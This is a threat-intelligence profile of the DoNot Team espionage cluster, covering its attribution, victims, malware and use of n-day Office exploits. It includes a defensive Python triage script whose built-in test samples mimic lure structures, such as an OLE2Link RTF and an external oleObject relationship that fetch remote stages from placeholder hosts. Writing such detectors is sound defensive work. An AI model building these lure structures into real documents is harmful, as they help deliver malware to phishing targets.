DoNot Team (also tracked as APT-C-35, SectorE02, Origami Elephant, Viceroy Tiger, and MITRE ATT&CK G0157) is a suspected India-aligned cyber-espionage cluster active since at least 2016. Its highest-confidence public attribution event is the Amnesty International Security Lab report of October 2021 tying DoNot Team operations to INNEFU Labs, an Indian commercial cybersecurity contractor that has bid for and won contracts with Indian government entities. The Amnesty investigation was one of the most operationally specific public attribution findings for any India-aligned cluster, moving attribution beyond country-level "suspected India-aligned" framing toward identification of a specific commercial contractor. Whether INNEFU operates DoNot directly, subcontracts operations to other entities, or works on behalf of specific Indian government agencies (R&AW, IB, NTRO) has not been formally established, and no US, UK, EU, or other government attribution has been issued.

The cluster is operationally distinct from the peer India-aligned clusters in this corpus on three dimensions.

First, DoNot's signature operational pattern is sustained targeting of Indian domestic dissidents (Kashmiri activists, Sikh political figures, Muslim-minority activists) alongside sustained targeting of Sikh-diaspora activists in Canada, the United Kingdom, the United States, Australia, and Germany. This domestic-and-diaspora dissident-surveillance pattern distinguishes DoNot from SideWinder (Pakistani government and military focus), Patchwork (Pakistani government focus), and Bitter (Pakistan, China, and Bangladesh focus), all of which operate against external rather than Indian domestic or diaspora targets.
The domestic-surveillance pattern became politically consequential in international context after the June 2023 killing of Sikh activist Hardeep Singh Nijjar in Canada and the September 2023 public allegation by the Canadian government of Indian government involvement. While no specific Sikh-diaspora cyber operation has been formally attributed to DoNot Team (as opposed to Indian state activity broadly), the cluster's documented Sikh-diaspora targeting is a relevant operational data point for that broader policy context.

Second, DoNot's toolkit centers on the Yty modular Windows malware framework (first detailed publicly by NETSCOUT Arbor ASERT in March 2018), the Gedit downloader, StealJob, DarkMusical, Firestarter (Android), and DoNot Lite. This toolkit is distinct from BitterRAT/ARTRA (Bitter), from SideWinder's StealerBot family, and from Patchwork's BADNEWS lineage; cluster-level toolkit attribution remains the reliable discriminator, not the shared India-alignment framing.

Third, Pakistani targeting is one of several victim categories rather than the dominant one, which distinguishes DoNot's victimology from SideWinder (where Pakistani targeting is the central mission) and Bitter (where it is primary). DoNot operates against Pakistani, Bangladeshi, Sri Lankan, Nepali, Bhutanese, Burmese, Tajik, Kyrgyz, Indian domestic, Sikh-diaspora, and selected European targets, a broader victim portfolio than its peer India-aligned clusters.

Operationally, DoNot relies predominantly on spear-phishing with weaponized Office documents exploiting disclosed n-day vulnerabilities (CVE-2017-0199, CVE-2017-11882, CVE-2018-0802, CVE-2018-0798, and CVE-2022-30190 "Follina") followed by Yty implant deployment. Android implants are delivered through fake third-party app stores, trojanized clones of legitimate apps, and targeted APK delivery via spear-phishing. The cluster has not demonstrated 0day-development capability and relies on rapid weaponization of n-day vulnerabilities combined with social-engineering tradecraft.
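As an added example (not DoNot tooling, not code from any vendor report cited on this page), the following Python triage script checks a document for the static artefacts of the n-day lure families listed above: Equation Editor OLE objects (CVE-2017-11882, CVE-2018-0802, CVE-2018-0798), OLE2Link auto-updating objects in RTF (CVE-2017-0199), and OOXML relationships that pull a remote object or template or carry an ms-msdt: target (the CVE-2017-0199 docx variant and the Follina delivery chain). The sample documents are constructed inside the script and are not real lures; the REMOTE_REL_TYPES list and the example.invalid hostnames are assumptions for the example.

```python
"""Static triage for the Office n-day lure families listed above.
Added example, not DoNot tooling or any vendor's detection logic."""
import binascii
import io
import re
import zipfile

# Public, well-known artefacts of the lure families. Class names appear in RTF
# \objclass control words and inside the hex-encoded \objdata OLE stream.
RTF_INDICATORS = {
    b"Equation.3": "Equation Editor object (CVE-2017-11882 / CVE-2018-0802 / CVE-2018-0798)",
    b"OLE2Link": "OLE2Link remote object (CVE-2017-0199)",
}
# OOXML relationship types that make Word fetch content from outside the package.
# Assumed list for this example; extend for your environment.
REMOTE_REL_TYPES = {"oleObject", "attachedTemplate"}

OBJCLASS_RE = re.compile(rb"\\objclass\s+([A-Za-z0-9._]+)")
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")
REL_RE = re.compile(rb"<Relationship\b[^>]*>")
ATTR_RE = re.compile(rb'(\w+)="([^"]*)"')


def scan_rtf(data: bytes) -> list[str]:
    """Findings for an RTF blob: forced OLE link refresh, suspicious object
    classes, and known class names inside decoded \\objdata payloads."""
    findings = []
    if not data.lstrip().lower().startswith(b"{\\rt"):
        return findings
    if b"\\objupdate" in data:
        findings.append("RTF: \\objupdate forces the OLE link to refresh on open (CVE-2017-0199 pattern)")
    for m in OBJCLASS_RE.finditer(data):
        cls = m.group(1)
        for ind, label in RTF_INDICATORS.items():
            if ind.lower() in cls.lower():
                findings.append(f"RTF: objclass {cls.decode()} -> {label}")
    for m in OBJDATA_RE.finditer(data):
        hexblob = re.sub(rb"\s+", b"", m.group(1))
        hexblob = hexblob[: len(hexblob) & ~1]  # drop a dangling nibble
        try:
            blob = binascii.unhexlify(hexblob)
        except binascii.Error:
            continue
        for ind, label in RTF_INDICATORS.items():
            if ind in blob:
                findings.append(f"RTF: objdata carries {ind.decode()} -> {label}")
    return findings


def scan_ooxml(data: bytes) -> list[str]:
    """Findings for a docx/xlsx/pptx package: relationships that pull a remote
    object or template, and any ms-msdt: protocol-handler target (Follina)."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    for name in zf.namelist():
        if not name.endswith(".rels"):
            continue
        for rel in REL_RE.finditer(zf.read(name)):
            attrs = {k.decode(): v.decode() for k, v in ATTR_RE.findall(rel.group(0))}
            target = attrs.get("Target", "")
            rtype = attrs.get("Type", "").rsplit("/", 1)[-1]
            if attrs.get("TargetMode") == "External" and rtype in REMOTE_REL_TYPES:
                findings.append(f"OOXML: {name} external {rtype} -> {target} "
                                "(remote object/template fetch: CVE-2017-0199 docx variant, Follina staging)")
            if target.lower().startswith("ms-msdt:"):
                findings.append(f"OOXML: {name} ms-msdt: target -> CVE-2022-30190 Follina")
    return findings


def triage(data: bytes) -> list[str]:
    """Run both scanners; the RTF check ignores zips and vice versa."""
    return scan_rtf(data) + scan_ooxml(data)


def build_samples() -> dict[str, bytes]:
    """Constructed samples so the example runs offline. None are real lures;
    hostnames use the reserved .invalid TLD."""
    benign_rtf = b"{\\rtf1\\ansi Quarterly report.\\par}"
    eqn_rtf = (b"{\\rtf1{\\object\\objemb{\\*\\objclass Equation.3}{\\*\\objdata "
               + binascii.hexlify(b"\x01\x05\x00Equation.3\x00") + b"}}}")
    link_rtf = (b"{\\rtf1{\\object\\objautlink\\objupdate{\\*\\objclass Word.Document.8}{\\*\\objdata "
                + binascii.hexlify(b"OLE2Link\x00http://example.invalid/stage.hta") + b"}}}")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels",
                    '<Relationships><Relationship Id="rId9" '
                    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
                    'Target="mhtml:http://example.invalid/lure.html!x-usc:http://example.invalid/lure.html" '
                    'TargetMode="External"/></Relationships>')
    return {"benign.rtf": benign_rtf, "equation.rtf": eqn_rtf,
            "ole2link.rtf": link_rtf, "remote.docx": buf.getvalue()}


if __name__ == "__main__":
    for fname, blob in build_samples().items():
        hits = triage(blob)
        print(f"{fname}: {'clean' if not hits else ''}")
        for h in hits:
            print("  " + h)
```

The script is a static pre-filter, not a verdict: a hit on an external oleObject relationship or an Equation.3 object says the document uses a delivery primitive these n-day exploits rely on, and the file should go to a sandbox rather than to a user. A clean result proves nothing about the second stage (the fetched HTML, HTA or Yty dropper), which is where the actual payload lives.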
A handful of operational notes. First, the Amnesty attribution to INNEFU Labs has not produced an observable operational pause: the cluster continues to operate through 2024 and into 2025 per ESET, Amnesty International, Recorded Future, and other vendor tracking. Second, the contractor-versus-direct framing is now better established for DoNot Team than for SideWinder, Patchwork, or Bitter, making DoNot the cluster with the most specific contractor-level attribution among the publicly tracked India-aligned clusters. The pattern resembles the cluster-contractor relationships observable in parts of the China-aligned ecosystem (APT41, Earth Lusca, RedHotel) and in the Iranian ecosystem (front companies such as Najee Technology Hooshmand Fater, designated by the US Treasury in September 2022, and Secnerd LLC). Third, the India-aligned ecosystem now has four publicly tracked distinct clusters in this corpus: SideWinder, Patchwork, Bitter / APT-C-08, and DoNot Team / APT-C-35. Whether the four share infrastructure, tooling, or personnel through common contractors or service entities remains analytically open across vendor reporting; the INNEFU connection from the Amnesty report is one specific data point in that broader open question.